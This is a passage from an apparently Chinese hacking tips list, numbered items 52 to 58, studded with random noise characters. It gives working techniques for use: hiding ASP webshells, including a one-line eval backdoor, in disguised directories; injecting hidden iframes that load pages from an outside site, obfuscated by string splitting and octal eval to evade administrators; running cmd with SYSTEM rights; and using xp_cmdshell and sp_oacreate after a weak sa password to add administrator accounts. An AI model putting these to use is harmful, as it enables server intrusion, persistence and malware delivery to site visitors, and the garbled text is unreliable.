! u5 p# X# k( [2 \7 w+ ^52、at "12:17" /interactive cmd- u( i' D K( H7 l
执行后可以用AT命令查看新加的任务- j# ]4 P& z# y. y B% L* P
用AT这个命令以交互的方式运行cmd.exe 这样运行的cmd.exe是system权限。0 u! t- Y$ X' P+ O, V
2 H" z5 c! j" ^53、隐藏ASP后门的两种方法
7 h0 E! N j2 d5 m. I1、建立非标准目录:mkdir images..\
( Q, \4 @8 t9 a/ U, I2 t拷贝ASP木马至目录:copy c:\inetpub\wwwroot\dbm6.asp c:\inetpub\wwwroot\images..\news.asp
; ?. X/ Y9 o! P1 |) D+ f7 |- v- W8 M通过web访问ASP木马:http://ip/images../news.asp?action=login4 d G# a' ~/ s' b9 O* P5 f
如何删除非标准目录:rmdir images..\ /s
9 _" s" I( r. Q* l9 q' ^# T2、Windows中的IIS会对以.asp结尾的目录中的文件进行解析,以达到我们隐藏自己的网页后门的目的:
q d0 s5 e4 y7 N& w* A3 p, Y& hmkdir programme.asp
8 p$ S! C) N% a( u! D% N1 s# {新建1.txt文件内容:<!--#include file=”12.jpg”-->/ j( r! ?* ^5 B" ]9 n
新建12.jpg文件内容:<%execute(request("l"))%> 或使用GIF与ASP合并后的文件
& W9 u2 W- W Fattrib +H +S programme.asp
; L- g8 Z7 A+ g* f4 t e# s通过web访问ASP一句话木马:http://ip/images/programme.asp/1.txt: }9 h7 q) c* f+ {% |. c& ~
' M, }5 t" U! r54、attrib /d /s c:\windows +h +s,后windows目录变为隐藏+系统,隐藏属性为灰不可更改,windows目录下面的文件和目录并没有继承属性,原来是什么样还是什么样。, J9 P% Z5 d; A/ a; Y P b' R
然后在利用attrib /d /s c:\windows -h -s,windows目录可以显示,隐藏属性可以再次选中。
% f# ~$ C8 M6 Y$ L' U3 d; _; e4 e- A B O4 O# n+ G
55、JS隐蔽挂马" J/ B$ {* Q+ o
1.
" F# Z V- F2 J4 E+ n7 X& pvar tr4c3="<iframe src=ht";
5 ~4 M* j/ E- c% ^6 M, p$ P) Z: [tr4c3 = tr4c3+"tp:/";
3 ~0 K% p4 ?" X9 ]; ^9 d0 ^tr4c3 = tr4c3+"/ww";
5 I" O; x& }1 V% q( Str4c3 = tr4c3+"w.tr4";
7 g' [( H, o, @( y; \1 f2 O ztr4c3 = tr4c3+"c3.com/inc/m";. d8 Z' S' x) G! o: Y$ D
tr4c3 = tr4c3+"m.htm style="display:none"></i";
2 f! {% W! W7 ~2 rtr4c3 =tr4c3+"frame>'";
1 P) x) S, @9 R* Q' v. @" Ddocument.write(tr4c3);
# ~. M( R1 Z- Z% @9 ^. V& ^& s避免被管理员搜索网马地址找出来。把变量名定义的和网站本身的接近些,混淆度增加。* |* M4 ~- r7 e8 w* \
, p5 [5 @1 f! S$ A, W. ~# h
2.2 x, y" e: ~7 _5 ^0 {( Q! ]+ C# g* Z) H
转换进制,然后用EVAL执行。如; w/ V) d d$ J X
eval("\144\157\143\165\155\145\156\164\56\167\162\151\164\145\40\50\42\74\151\146\162\141\155\145\40\163\162\143\75\150\164\164\160\72\57\57\167\167\167\56\164\162\64\143\63\56\143\157\155\57\151\156\143\57\155\155\56\150\164\155\40\163\164\171\154\145\75\42\42\144\151\163\160\154\141\171\72\156\157\156\145\42\42\76\74\57\151\146\162\141\155\145\76\42\51\73");
* n3 B3 b: q' O+ @# K3 N不过这个有点显眼。% ^9 ^7 j/ B% G5 h( ^
3.. L) o7 ]% H5 W$ w) k0 j
document.write ('<iframe src=http://www.tr4c3.com/inc/mm.htm style="display:none"></iframe>');. S+ {# |" T1 a7 ~ M* s
最后一点,别忘了把文件的时间也修改下。
* r0 C: [/ q L8 n
* O# X$ C* q( a56.3389终端入侵常用DOS命令5 V7 M+ I9 K: G; ?# h
taskkill taskkill /PID 1248 /t& [' R7 z8 I" y' s1 z# Z$ a' Y2 D- X! b
+ T- [' Z# R8 `7 L. k
tasklist 查进程! a3 o7 e8 u `- B* Y; t; l
3 Y) A6 x# r0 |
cacls "C:\Program Files\ewido anti-spyware 4.0\guard.exe" /d:everyone 改、降低某文件权限
3 ~; M8 z# _4 q# b# I# t. ciisreset /reboot
: \/ E& U0 _) A! F; X$ l* Itsshutdn /reboot /delay:1 重起服务器
6 n4 X" i8 f5 G* j- q+ ?
: _: y& D, _7 W" b# I7 k& b, X/ Plogoff 12 要使用会话 ID(例如,会话 12)从会话中注销用户,
4 J7 p' \; b" y, ?
& Z/ u8 {/ ` j0 Q; N, M! ?query user 查看当前终端用户在线情况
0 E) F) E$ n2 v' I0 n
$ `5 g$ {: y8 A1 w+ `2 {要显示有关所有会话使用的进程的信息,请键入:query process *
7 p2 E7 r. S+ U& t X( f s( e! F( S
要显示有关会话 ID 2 使用的进程的信息,请键入:query process /ID:2: @7 p& {! G! F0 I
5 U0 o, G6 l0 A# P要显示有关服务器 SERVER2 上所有活动会话的信息,请键入:query session /server:SERVER2
+ y% ?- p0 s9 M& t \$ ^
- E9 J5 N7 d) a) y. [7 V. s' t要显示有关当前会话 MODEM02 的信息,请键入:query session MODEM02" |% U/ x+ y3 r; V7 z
3 E/ ~) l& I+ W! n* u命令列:rundll32.exe user.exe,restartwindows 功能: 系统重启: R/ a+ G+ f1 P( K" N, W
3 w6 Q' i% [0 A8 {( c' N
命令列:rundll32.exe user.exe,exitwindows 功能: 关闭系统
, M( z' U& Y2 R/ C! f; F- a5 x
, q" j# v* U( Z$ G# d命令列: rundll32.exe user.exe,restartwindows 功能: 强行关闭所有程式并重启机器。
& k1 p) t3 `* ~" K( k) T) Q& c+ q2 I2 O( I: |6 ]% a1 \* A- Y- w( @
命令列: rundll32.exe user.exe,exitwindows 功能: 强行关闭所有程式并关机* \& ^' K" c5 m! |
2 J7 k, l( ]- h- d* y I4 Q56、在地址栏或按Ctrl+O,输入:' r Z0 G7 V" y M( }
javascript:s=document.documentElement.outerHTML;document.write('<body></body>');document.body.innerText=s;
# \$ x" M" A4 \# V7 M
2 E0 I4 q! O2 u p8 S" F源代码就出来了。不论加密如何复杂,最终都要还原成浏览器可以解析的html代码,而documentElement.outerHTML正是最终的结果。
: {! m5 z1 H7 m) _9 B! w
( K3 ^5 n& ^0 w1 m$ j57、net user的时候,是不能显示加$的用户,但是如果不处理的话,0 V2 u) M; G7 K: X8 c
用net localgroup administrators是可以看到管理组下,加了$的用户的。- r% y% `4 C1 t% u/ b
4 C5 N$ n0 U% X& k% B; k: g0 K8 b* L
58、 sa弱口令相关命令% N! @3 B1 _! f6 P$ |3 u
* e$ u$ T2 {! F
一.更改sa口令方法: o7 I, Z, [" |/ q" f4 U; w' ?. d
用sql综合利用工具连接后,执行命令:
+ f( W' Y. N& M6 C' Nexec sp_password NULL,'20001001','sa'
9 A5 a4 f: T( x: S5 k(提示:慎用!)# d! Z: k& V7 U5 s, d8 D
7 C$ {0 F; {, F. p( Y
二.简单修补sa弱口令.7 @5 A+ I# F- y
& `" I5 ^6 G7 M! a/ N
方法1:查询分离器连接后执行:" T% w& w& L0 f
if exists (select * from
9 X# H! G# m. h. s& ~dbo.sysobjects where id = object_id(N'[dbo].[xp_cmdshell]') and
" G+ X2 z+ }" ]0 s9 U& FOBJECTPROPERTY(id, N'IsExtendedProc') = 1)
; K; |. c4 d. e& G+ \/ d' H; G* n$ Z' B) h
exec sp_dropextendedproc N'[dbo].[xp_cmdshell]'5 f! w1 j% z, `6 Y" G
! z5 e5 k9 S! S7 g) H/ f( DGO
$ W% d0 g; a! V# C& N& W5 A
( ^1 v) E# [- ~% C2 ?2 Y9 J然后按F5键命令执行完毕' \( Q* c6 ?6 j, j! Q
4 v- ?3 J% A! t; ?方法2:查询分离器连接后
' R# B3 b$ A7 l6 @3 T% }" p0 m第一步执行:use master
" n. S' j% K$ X2 T) G! r第二步执行:sp_dropextendedproc 'xp_cmdshell'8 g1 l2 U" o& _+ z
然后按F5键命令执行完毕
0 j* x. X8 ^2 }+ v8 `- h$ Q3 W9 Y9 m( n: {; V
/ Z+ U, Q& b4 M1 e' u4 K* A% P三.常见情况恢复执行xp_cmdshell.7 k- M6 K7 K# g: h) N2 P) J
! M+ W5 B' {+ R9 W& u
3 W! O1 t% h, E# t2 H1 未能找到存储过程'master..xpcmdshell'.
8 Y9 s0 |2 `( u @" V1 n( } 恢复方法:查询分离器连接后,
6 c+ T' ]7 |! {' g4 I第一步执行:EXEC sp_addextendedproc xp_cmdshell,@dllname ='xplog70.dll'declare @o int
2 d) ~5 n* N1 |7 w% Y, l0 `第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'
8 J( p" R7 i2 R2 r% i% k然后按F5键命令执行完毕
. |1 P% C* }, n- U. ]3 \ }- s; K: N. L: g
2 无法装载 DLL xpsql70.dll 或该DLL所引用的某一 DLL。原因126(找不到指定模块。)
& T i2 [( _+ s+ S( v4 {恢复方法:查询分离器连接后,
: V; @% v6 ?3 x" y6 Y5 g w6 ?+ r第一步执行:sp_dropextendedproc "xp_cmdshell"
0 v! I3 Y, I0 V* d: b7 b" b第二步执行:sp_addextendedproc 'xp_cmdshell', 'xpsql70.dll'6 ^( a' E; ?$ J
然后按F5键命令执行完毕
- y' P( R) Y4 ?1 i9 I+ x" t9 a3 K$ d8 e: b
3 无法在库 xpweb70.dll 中找到函数 xp_cmdshell。原因: 127(找不到指定的程序。)
# }, G; X/ a: U- U0 |+ \4 I恢复方法:查询分离器连接后,6 e- ~9 g/ L1 b+ |4 d; A: Y9 @" J9 w
第一步执行:exec sp_dropextendedproc 'xp_cmdshell'
* ?# P j+ a1 J$ g; G3 y2 T第二步执行:exec sp_addextendedproc 'xp_cmdshell','xpweb70.dll'
9 I8 \: `; M6 ?/ {* c4 n& q然后按F5键命令执行完毕
9 H; k% c% N) W, c! ?) s2 j' E- p2 H& I& X0 F# l y
四.终极方法.
% A$ Y& Y( t' Q8 R如果以上方法均不可恢复,请尝试用下面的办法直接添加帐户:! j1 P2 X) W( s: i2 ~
查询分离器连接后,' u. f) }3 n+ i$ e. p$ c* u8 P
2000servser系统:
+ o1 \9 M) C& \declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net user 用户名 密码 /add'6 |' r) h% ?1 K9 `6 h' k4 D9 ~
9 K" }4 ?5 L% U* y. L/ _# x
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd.exe /c net localgroup administrators 用户名 /add'
6 l, F% }: B/ O0 o: A# I2 ~! q- a, h0 f! e" k" z
xp或2003server系统:5 H' h x3 D' D
7 ?6 I7 @8 s. }9 Ddeclare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net user 用户名 密码 /add'
- Y$ F1 v# I$ n; h! y- U/ g! M; b+ }0 c7 u4 @% p
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\cmd.exe /c net localgroup administrators 用户名 /add'$ h" u. _' K! k" w
|